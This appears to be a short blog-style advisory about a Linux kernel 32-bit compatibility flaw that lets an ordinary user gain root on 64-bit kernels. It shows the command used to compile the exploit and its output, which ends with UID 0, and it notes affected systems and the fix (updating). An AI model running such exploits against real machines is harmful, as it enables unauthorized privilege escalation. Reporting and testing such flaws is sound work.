A new security flaw has been discovered in the Linux kernel, specifically in its 32-bit compatibility layer. The exploit allows an ordinary user to become root on a machine running a 64-bit Linux kernel. The only way to counter this type of attack is to update your system.
Here is an example of the exploit in use. First, compile it:
gcc -o ia32syscall_xpl ia32syscall_xpl.c
Then execute it; the output looks like this:
resolved symbol commit_creds to 0xffffffff8108bd90
resolved symbol prepare_kernel_cred to 0xffffffff8108c170
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
I have successfully tested this method on a live CD of the 64-bit version of Ubuntu 10.04. A complete list of impacted versions of Ubuntu is available here.
Red Hat RHEL 5 does not seem to be affected by this flaw, according to this bug report.